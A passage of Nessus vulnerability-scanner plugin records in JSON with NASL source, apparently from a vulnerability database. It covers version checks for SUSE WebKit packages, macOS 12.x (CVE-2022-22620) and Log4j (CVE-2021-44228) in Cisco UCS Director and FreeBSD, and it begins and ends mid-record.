{'reference':'libwebkit2gtk-4_0-37-2.34.6-2.88.1', 'sp':'4', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'libwebkit2gtk3-lang-2.34.6-2.88.1', 'sp':'4', 'release':'SLES_SAP12', 
'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.34.6-2.88.1', 'sp':'4', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.34.6-2.88.1', 'sp':'4', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.34.6-2.88.1', 'sp':'4', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.34.6-2.88.1', 'sp':'4', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.34.6-2.88.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'libwebkit2gtk-4_0-37-2.34.6-2.88.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'libwebkit2gtk3-lang-2.34.6-2.88.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.34.6-2.88.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.34.6-2.88.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.34.6-2.88.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.34.6-2.88.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'webkit2gtk3-devel-2.34.6-2.88.1', 'sp':'5', 
'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.34.6-2.88.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-sdk-release-12.5', 'sles-release-12.5']},\n {'reference':'webkit2gtk3-devel-2.34.6-2.88.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-sdk-release-12.5', 'sles-release-12.5']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.34.6-2.88.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'libwebkit2gtk-4_0-37-2.34.6-2.88.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'libwebkit2gtk3-lang-2.34.6-2.88.1', 'sp':'2', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.34.6-2.88.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.34.6-2.88.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.34.6-2.88.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.34.6-2.88.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'webkit2gtk3-devel-2.34.6-2.88.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.34.6-2.88.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n 
{'reference':'libjavascriptcoregtk-4_0-18-2.34.6-2.88.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'libwebkit2gtk-4_0-37-2.34.6-2.88.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'libwebkit2gtk-4_0-37-2.34.6-2.88.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'libwebkit2gtk3-lang-2.34.6-2.88.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.34.6-2.88.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.34.6-2.88.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.34.6-2.88.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.34.6-2.88.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.34.6-2.88.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.34.6-2.88.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.34.6-2.88.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.34.6-2.88.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'libwebkit2gtk-4_0-37-2.34.6-2.88.1', 'sp':'4', 'release':'SLES12', 
'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'libwebkit2gtk3-lang-2.34.6-2.88.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.34.6-2.88.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.34.6-2.88.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.34.6-2.88.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.34.6-2.88.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.34.6-2.88.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.5']},\n {'reference':'libwebkit2gtk-4_0-37-2.34.6-2.88.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.5']},\n {'reference':'libwebkit2gtk3-lang-2.34.6-2.88.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.5']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.34.6-2.88.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.5']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.34.6-2.88.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.5']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.34.6-2.88.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.5']}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n 
if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && _release) {\n if (exists_check) {\n var check_flag = 0;\n foreach var check (exists_check) {\n if (!rpm_exists(release:_release, rpm:check)) continue;\n if ('ltss' >< tolower(check)) ltss_caveat_required = TRUE;\n check_flag++;\n }\n if (!check_flag) continue;\n }\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n var ltss_plugin_caveat = NULL;\n if(ltss_caveat_required) ltss_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in SUSE Enterprise Linux Server LTSS\\n' +\n 'repositories. Access to these package security updates require\\n' +\n 'a paid SUSE LTSS subscription.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + ltss_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libjavascriptcoregtk-4_0-18 / libwebkit2gtk-4_0-37 / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:41:54", "description": "The remote host is running a version of macOS / Mac OS X that is 12.x prior to 12.2.1 Monterey. It is, therefore, affected by a use after free issue which was addressed with improved memory management. 
Successful exploitation could lead to arbitrary code execution on an affected host.\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported version number.", "cvss3": {}, "published": "2022-02-18T00:00:00", "type": "nessus", "title": "macOS 12.x < 12.2.1 (HT213092)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22620"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_HT213092.NASL", "href": "https://www.tenable.com/plugins/nessus/158163", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158163);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2022-22620\");\n script_xref(name:\"APPLE-SA\", value:\"HT213092\");\n script_xref(name:\"IAVA\", value:\"2022-A-0082-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/25\");\n\n script_name(english:\"macOS 12.x < 12.2.1 (HT213092)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is 12.x prior to 12.2.1 Monterey. It is, therefore,\naffected by a use after free issue which was addressed with improved memory management. 
Successful exploitation could\nlead to arbitrary code execution on an affected host.\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported\nversion number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT213092\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS 12.2.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22620\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/local_checks_enabled\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras_apple.inc');\n\nvar app_info = vcf::apple::macos::get_app_info();\nvar constraints = [{'min_version': '12.0', 'fixed_version': '12.2.1', 'fixed_display': 'macOS Monterey 12.2.1'}];\n\nvcf::apple::macos::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_WARNING\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:30:23", "description": "Cisco UCS Director is affected by the following critical vulnerability in the Apache Log4j Java logging library as described in the cisco-sa-apache-log4j-qRuKNEbd advisory.\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. 
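Both plugin sources above reduce to the same question: is the installed build older than the fixed one? The SUSE plugin answers it per package with `rpm_check(... rpm_spec_vers_cmp:TRUE)` against references such as `libwebkit2gtk-4_0-37-2.34.6-2.88.1`, and the HT213092 plugin answers it for the OS with a `min_version`/`fixed_version` constraint. The Python below is an added example, not Tenable's NASL helpers or any code from the page: it reimplements the ordering rules of rpm's rpmvercmp() (digit runs compared numerically with leading zeros dropped, letter runs compared lexically, a numeric segment outranking an alphabetic one, `~` sorting before the end of a string and `^` after it), splits `name-[epoch:]version-release` strings, and applies the result both to a constructed package inventory against the fixed references quoted above and to the 12.0 <= version < 12.2.1 macOS window. The installed package list and macOS version strings are constructed test data, not from any real host.

```python
"""Version-ordering checks behind the SUSE (rpm) and macOS plugins above.
Added example: an independent reimplementation of rpm's rpmvercmp() ordering,
not Tenable's NASL helpers. The inventory data below is constructed."""
import re

# Fixed references as listed in the SUSE plugin text above (name-version-release).
FIXED_REFERENCES = [
    "libjavascriptcoregtk-4_0-18-2.34.6-2.88.1",
    "libwebkit2gtk-4_0-37-2.34.6-2.88.1",
    "webkit2gtk3-devel-2.34.6-2.88.1",
]

# Constructed inventory for a hypothetical SLES host, roughly what
# `rpm -qa --qf '%{NAME}-%{EVR}\n'` prints.
INSTALLED = [
    "libwebkit2gtk-4_0-37-2.34.5-2.85.1",         # older than the fix: vulnerable
    "libjavascriptcoregtk-4_0-18-2.34.6-2.88.1",  # exactly the fixed build
    "webkit2gtk3-devel-2.34.6-2.90.1",            # newer release than the fix
    "bash-4.4-9.1",                               # not covered by the advisory
]


def rpmvercmp(a: str, b: str) -> int:
    """Order two rpm version/release strings; returns -1, 0 or 1 like rpmvercmp()."""
    if a == b:
        return 0
    i = j = 0
    la, lb = len(a), len(b)
    while i < la or j < lb:
        # Separators (anything not alphanumeric, '~' or '^') carry no meaning.
        while i < la and not (a[i].isalnum() or a[i] in "~^"):
            i += 1
        while j < lb and not (b[j].isalnum() or b[j] in "~^"):
            j += 1
        # '~' sorts before everything, including the end of the string (1.0~rc1 < 1.0).
        ta, tb = i < la and a[i] == "~", j < lb and b[j] == "~"
        if ta or tb:
            if ta and tb:
                i, j = i + 1, j + 1
                continue
            return -1 if ta else 1
        # '^' sorts after the end of the string but before any other segment
        # (1.0 < 1.0^post < 1.0.1).
        ca, cb = i < la and a[i] == "^", j < lb and b[j] == "^"
        if ca or cb:
            if ca and cb:
                i, j = i + 1, j + 1
                continue
            if ca:
                return 1 if j >= lb else -1
            return -1 if i >= la else 1
        if i >= la or j >= lb:
            break
        # Take a run of digits or a run of letters, whichever `a` starts with.
        if a[i].isdigit():
            ma, mb, isnum = re.match(r"\d+", a[i:]), re.match(r"\d+", b[j:]), True
        else:
            ma, mb, isnum = re.match(r"[A-Za-z]+", a[i:]), re.match(r"[A-Za-z]+", b[j:]), False
        sa, sb = ma.group(0), (mb.group(0) if mb else "")
        i, j = i + len(sa), j + len(sb)
        if not sb:
            return 1 if isnum else -1        # numeric beats alphabetic at the same position
        if isnum:
            sa, sb = sa.lstrip("0"), sb.lstrip("0")
            if len(sa) != len(sb):          # longer digit run is the larger number
                return 1 if len(sa) > len(sb) else -1
        if sa != sb:
            return 1 if sa > sb else -1
    if i >= la and j >= lb:
        return 0
    return -1 if i >= la else 1             # whichever string has segments left is newer


def split_nevr(pkg: str):
    """'name-[epoch:]version-release' -> (name, epoch, version, release)."""
    name, version, release = pkg.rsplit("-", 2)
    epoch = 0
    if ":" in version:
        e, version = version.split(":", 1)
        epoch = int(e)
    return name, epoch, version, release


def evr_cmp(a, b) -> int:
    """Compare (epoch, version, release): epoch numerically, then rpmvercmp on each part."""
    if a[0] != b[0]:
        return -1 if a[0] < b[0] else 1
    return rpmvercmp(a[1], b[1]) or rpmvercmp(a[2], b[2])


def vulnerable_packages(installed, fixed_refs):
    """Installed packages named in the fix list whose EVR is older than the fix."""
    fixed = {}
    for ref in fixed_refs:
        name, *evr = split_nevr(ref)
        fixed[name] = tuple(evr)
    hits = []
    for pkg in installed:
        name, *evr = split_nevr(pkg)
        if name in fixed and evr_cmp(tuple(evr), fixed[name]) < 0:
            hits.append(pkg)
    return hits


def macos_in_window(version: str, min_version: str = "12.0", fixed_version: str = "12.2.1") -> bool:
    """The HT213092 plugin's constraint: min_version <= version < fixed_version."""
    return rpmvercmp(version, min_version) >= 0 and rpmvercmp(version, fixed_version) < 0


if __name__ == "__main__":
    print("vulnerable rpms:", vulnerable_packages(INSTALLED, FIXED_REFERENCES))
    for v in ("11.6.4", "12.2", "12.2.1"):
        print("macOS", v, "in affected window:", macos_in_window(v))
```

Two details matter in practice. The epoch is compared first and is not part of the file name, so an inventory taken from `ls` of the package cache rather than from the rpm database can misclassify a package that carries an epoch. And, like the plugins, this only tests the reported version: a host whose self-reported version string is stale, or a WebKit build patched under the same version, will be reported wrongly in the same direction.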
(CVE-2021-44228) Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-06-03T00:00:00", "type": "nessus", "title": "Cisco UCS Director Log4j Remote Code Execution (cisco-sa-apache-log4j-qRuKNEbd)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-02-17T00:00:00", "cpe": ["cpe:/a:cisco:ucs_director"], "id": "CISCO-SA-APACHE-LOG4J-QRUKNEBD-UCS-DIRECTOR.NASL", "href": "https://www.tenable.com/plugins/nessus/161813", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161813);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/17\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa47288\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-apache-log4j-qRuKNEbd\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"Cisco UCS Director Log4j Remote Code Execution (cisco-sa-apache-log4j-qRuKNEbd)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A package installed on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Cisco UCS Director is affected by the following critical vulnerability in the Apache Log4j Java logging library\n as described in the cisco-sa-apache-log4j-qRuKNEbd advisory.\n \n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log\n messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from\n LDAP servers when 
message lookup substitution is enabled. From log4j 2.15.0, this behavior has been\n disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this\n vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging\n Services projects. (CVE-2021-44228)\n \n Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\n number.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?395cf983\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47288\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID CSCwa47288\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2022/06/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:ucs_director\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ucs_director_detect.nbin\");\n script_require_keys(\"Host/Cisco/UCSDirector/version\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_info = vcf::get_app_info(app:'Cisco UCS Director', kb_ver:'Host/Cisco/UCSDirector/version');\n\n# UCS Director earlier than 6.8.2.0\nconstraints = [\n { 'fixed_version': '6.8.2.0'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-07T16:49:07", "description": "The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the 1ea05bb8-5d74-11ec-bb1e-001517a2e1a4 advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. 
In previous releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to true or it can be mitigated in prior releases (<2.10) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).\n (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-12-15T00:00:00", "type": "nessus", "title": "FreeBSD : serviio -- affected by log4j vulnerability (1ea05bb8-5d74-11ec-bb1e-001517a2e1a4)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-11-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:serviio", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "href": "https://www.tenable.com/plugins/nessus/156078", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156078);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/06\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n 